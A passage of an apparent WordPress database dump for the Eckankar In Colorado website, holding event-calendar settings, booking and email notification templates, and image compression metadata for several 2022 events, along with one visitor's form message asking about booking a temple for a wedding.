role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(171220,267334,'mec_event_status','EventScheduled'),(171221,267334,'mec_moved_online_link',''),(171222,267334,'mec_cancelled_reason',''),(171223,267334,'mec_display_cancellation_reason_in_single_page',''),(171224,267334,'protect_children',''),(171225,267334,'passster_activate_global_protection',NULL),(171226,267334,'passster_activate_protection',NULL),(171227,267334,'passster_protection_type','password'),(171228,267334,'boldgrid_hide_page_title','0'),(171229,267334,'_thumbnail_id','266816'),(171230,267334,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(171231,267334,'boldgrid_in_page_containers','1'),(171233,267334,'_dp_original','266545'),(171234,267334,'_edit_lock','1666049435:2'),(171235,267334,'_edit_last','2'),(191536,269018,'protect_children',''),(191535,269018,'mec_display_cancellation_reason_in_single_page',''),(191534,269018,'mec_cancelled_reason',''),(191532,269018,'mec_event_status','EventScheduled'),(191533,269018,'mec_moved_online_link',''),(171260,267338,'protect_children',''),(171261,267338,'mec_color',''),(171262,267338,'mec_location_id','118'),(171263,267338,'mec_dont_show_map','0'),(171264,267338,'mec_organizer_id','1'),(171265,267338,'mec_read_more',''),(171266,267338,'mec_more_info',''),(171267,267338,'mec_more_info_title',''),(171268,267338,'mec_more_info_target','_self'),(171269,267338,'mec_cost',''),(171270,267338,'mec_currency','a:0:{}'),(171271,267338,'mec_additional_organizer_ids','a:0:{}'),(171272,267338,'mec_additional_location_ids','a:0:{}'),(171273,267338,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-02\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-02\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171274,267338,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(171275,267338,'mec_certain_weekdays','a:0:{}'),(171276,267338,'mec_allday','0'),(171277,267338,'one_occurrence','0'),(171278,267338,'mec_hide_time','0'),(171279,267338,'mec_hide_end_time','0'),(171280,267338,'mec_comment',''),(171281,267338,'mec_timezone','global'),(171282,267338,'mec_countdown_method','global'),(171283,267338,'mec_public','1'),(171284,267338,'mec_start_date','2022-11-02'),(171285,267338,'mec_start_time_hour','7'),(171286,267338,'mec_start_time_minutes','0'),(171287,267338,'mec_start_time_ampm','PM'),(171288,267338,'mec_start_day_seconds','68400'),(171289,267338,'mec_end_date','2022-11-02'),(171290,267338,'mec_end_time_hour','8'),(171291,267338,'mec_end_time_minutes','0'),(171292,267338,'mec_end_time_ampm','PM'),(171293,267338,'mec_end_day_seconds','72000'),(171294,267338,'mec_repeat_status','0'),(171295,267338,'mec_repeat_type',''),(171296,267338,'mec_repeat_interval','1'),(171297,267338,'mec_repeat_end',''),(171298,267338,'mec_repeat_end_at_occurrences',''),(171299,267338,'mec_repeat_end_at_date',''),(171300,267338,'mec_advanced_days','a:0:{}'),(171301,267338,'mec_in_days',''),(171302,267338,'mec_not_in_days',''),(171303,267338,'mec_hourly_schedules','a:0:{}'),(171304,267338,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(171305,267338,'mec_tickets','a:0:{}'),(171306,267338,'mec_fees_global_inheritance','1'),(171307,267338,'mec_fees','a:0:{}'),(171308,267338,'mec_ticket_variations_global_inheritance','1'),(171309,267338,'mec_ticket_variations','a:0:{}'),(171310,267338,'mec_reg_fields_global_inheritance','1'),(171311,267338,'mec_reg_fields','a:0:{}'),(171312,267338,'mec_bfixed_fields','a:0:{}'),(171313,267338,'mec_op','a:0:{}'),(171314,267338,'mec_fields','a:0:{}'),(171315,267338,'mec_event_status','EventScheduled'),(171316,267338,'mec_moved_online_link',''),(171317,267338,'mec_cancelled_reason',''),(171318,267338,'mec_display_cancellation_reason_in_single_page',''),(171319,267338,'boldgrid_hide_page_title','0'),(171320,267338,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(171321,267338,'passster_activate_global_protection',NULL),(171322,267338,'passster_activate_protection',NULL),(171323,267338,'passster_protection_type','password'),(171326,267338,'_dp_original','266104'),(171325,267338,'boldgrid_in_page_containers','1'),(171327,267338,'_edit_lock','1666215360:2'),(171328,267338,'_edit_last','2'),(171329,267339,'_wp_attached_file','2022/10/group-1.jpg'),(171330,267339,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:818;s:6:\"height\";i:460;s:4:\"file\";s:19:\"2022/10/group-1.jpg\";s:8:\"filesize\";i:124166;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"group-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23158;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"group-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10903;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"group-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94379;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"group-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31727;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"group-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51747;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"group-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38059;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"group-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35669;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(171331,267339,'original-file','2022/10/group-1-updraft-pre-smush-original.jpg'),(171332,267339,'smush-complete','1'),(171333,267339,'smush-info','The file was compressed from 121.26 KB to 113.65 KB saving 6.27 percent using WP-Optimize'),(171334,267339,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:124166;s:12:\"smushed-size\";i:116379;s:15:\"savings-percent\";d:6.27;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:124166;s:10:\"compressed\";i:116379;}s:6:\"medium\";a:2:{s:8:\"original\";i:23158;s:10:\"compressed\";i:22223;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10903;s:10:\"compressed\";i:10559;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:94379;s:10:\"compressed\";i:91277;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:31727;s:10:\"compressed\";i:30551;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:51747;s:10:\"compressed\";i:49875;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:38059;s:10:\"compressed\";i:36550;}s:8:\"tileview\";a:2:{s:8:\"original\";i:35669;s:10:\"compressed\";i:34573;}}}'),(171335,267338,'_thumbnail_id','267339'),(171338,267341,'mec_location_id','122'),(171339,267341,'mec_dont_show_map','0'),(171340,267341,'mec_organizer_id','1'),(171341,267341,'mec_read_more',''),(171342,267341,'mec_more_info',''),(171343,267341,'mec_more_info_title',''),(171344,267341,'mec_more_info_target','_self'),(171345,267341,'mec_cost',''),(171346,267341,'mec_currency','a:0:{}'),(171347,267341,'mec_additional_organizer_ids','a:0:{}'),(171348,267341,'mec_additional_location_ids','a:0:{}'),(171349,267341,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-20\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-20\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171350,267341,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(171351,267341,'mec_certain_weekdays','a:0:{}'),(171352,267341,'mec_allday','0'),(171353,267341,'one_occurrence','0'),(171354,267341,'mec_hide_time','0'),(171355,267341,'mec_hide_end_time','0'),(171356,267341,'mec_comment',''),(171357,267341,'mec_timezone','global'),(171358,267341,'mec_countdown_method','global'),(171359,267341,'mec_public','1'),(171360,267341,'mec_start_date','2022-11-20'),(171361,267341,'mec_start_time_hour','10'),(171362,267341,'mec_start_time_minutes','30'),(171363,267341,'mec_start_time_ampm','AM'),(171364,267341,'mec_start_day_seconds','37800'),(171365,267341,'mec_end_date','2022-11-20'),(171366,267341,'mec_end_time_hour','11'),(171367,267341,'mec_end_time_minutes','30'),(171368,267341,'mec_end_time_ampm','AM'),(171369,267341,'mec_end_day_seconds','41400'),(171370,267341,'mec_repeat_status','0'),(171371,267341,'mec_repeat_type',''),(171372,267341,'mec_repeat_interval','1'),(171373,267341,'mec_repeat_end',''),(171374,267341,'mec_repeat_end_at_occurrences',''),(171375,267341,'mec_repeat_end_at_date',''),(171376,267341,'mec_advanced_days','a:0:{}'),(171377,267341,'mec_in_days',''),(171378,267341,'mec_not_in_days',''),(171379,267341,'mec_hourly_schedules','a:0:{}'),(171380,267341,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(171381,267341,'mec_tickets','a:0:{}'),(171382,267341,'mec_fees_global_inheritance','1'),(171383,267341,'mec_fees','a:0:{}'),(171384,267341,'mec_ticket_variations_global_inheritance','1'),(171385,267341,'mec_ticket_variations','a:0:{}'),(171386,267341,'mec_reg_fields_global_inheritance','1'),(171387,267341,'mec_reg_fields','a:0:{}'),(171388,267341,'mec_bfixed_fields','a:0:{}'),(171389,267341,'mec_op','a:0:{}'),(171390,267341,'mec_fields','a:0:{}'),(171391,267341,'mec_event_status','EventScheduled'),(171392,267341,'mec_moved_online_link',''),(171393,267341,'mec_cancelled_reason',''),(171394,267341,'mec_display_cancellation_reason_in_single_page',''),(171395,267341,'boldgrid_hide_page_title','0'),(171396,267341,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(171397,267341,'passster_activate_global_protection',NULL),(171398,267341,'passster_activate_protection',NULL),(171399,267341,'passster_protection_type','password'),(171400,267341,'boldgrid_in_page_containers','1'),(171401,267341,'_dp_original','265240'),(171402,267341,'_edit_lock','1668276661:2'),(171403,267341,'_edit_last','2'),(171404,267342,'_wp_attached_file','2022/10/harold-talk-OCT-2022-promo.jpg'),(171405,267342,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:786;s:6:\"height\";i:437;s:4:\"file\";s:38:\"2022/10/harold-talk-OCT-2022-promo.jpg\";s:8:\"filesize\";i:87370;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14721;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7288;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-768x427.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69062;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22131;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36943;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26869;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"harold-talk-OCT-2022-promo-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25466;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(171406,267341,'_thumbnail_id','267350'),(171407,267342,'original-file','2022/10/harold-talk-OCT-2022-promo-updraft-pre-smush-original.jpg'),(171408,267342,'smush-complete','1'),(171409,267342,'smush-info','The file was compressed from 85.32 KB to 81.91 KB saving 4 percent using WP-Optimize'),(171410,267342,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:87370;s:12:\"smushed-size\";i:83873;s:15:\"savings-percent\";d:4;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:87370;s:10:\"compressed\";i:83873;}s:6:\"medium\";a:2:{s:8:\"original\";i:14721;s:10:\"compressed\";i:14640;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7288;s:10:\"compressed\";i:7288;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:69062;s:10:\"compressed\";i:68252;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:22131;s:10:\"compressed\";i:22023;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:36943;s:10:\"compressed\";i:36629;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:26869;s:10:\"compressed\";i:26660;}s:8:\"tileview\";a:2:{s:8:\"original\";i:25466;s:10:\"compressed\";i:25403;}}}'),(172943,267520,'_field_104','RESA'),(172944,267520,'_field_105','Melony,\n\nThis is Dave Ogletree.  If you remember, we talked at the Minneapolis about using the temple for our wedding.  I believe the date we have selected is Jan. 4th.  I\'m not sure what the procedure is for this, but I guess the first thing is if the temple is available on that date.  Also, what would be any related costs.\n\nPlease contact me at your convenience for further discussion.\n\nIn ECK.\n\n\nDave Ogletree'),(172945,267520,'_form_id','10'),(172946,267520,'_seq_num','23'),(188216,268837,'mec_fees_global_inheritance','1'),(188217,268837,'mec_fees','a:0:{}'),(188215,268837,'mec_tickets','a:0:{}'),(173187,267554,'mec_hide_end_time','0'),(173763,267574,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/12/HU.webp - cannot be optimized, it has an invalid file type'),(173169,267554,'mec_color',''),(173170,267554,'mec_location_id','129'),(173171,267554,'mec_dont_show_map','0'),(173172,267554,'mec_organizer_id','1'),(173173,267554,'mec_read_more',''),(173174,267554,'mec_more_info',''),(173175,267554,'mec_more_info_title',''),(173176,267554,'mec_more_info_target','_self'),(173177,267554,'mec_cost',''),(173178,267554,'mec_currency','a:0:{}'),(173179,267554,'mec_additional_organizer_ids','a:0:{}'),(173180,267554,'mec_additional_location_ids','a:0:{}'),(173181,267554,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173182,267554,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173183,267554,'mec_certain_weekdays','a:0:{}'),(173184,267554,'mec_allday','0'),(173185,267554,'one_occurrence','0'),(173186,267554,'mec_hide_time','0'),(173164,267532,'_edit_lock','1669782491:2'),(173165,267532,'original-file','2022/11/winter-effects-10-J-updraft-pre-smush-original.jpg'),(173166,267532,'smush-complete','1'),(173167,267532,'smush-info','The file was compressed from 248.32 KB to 248.32 KB saving 0 percent using 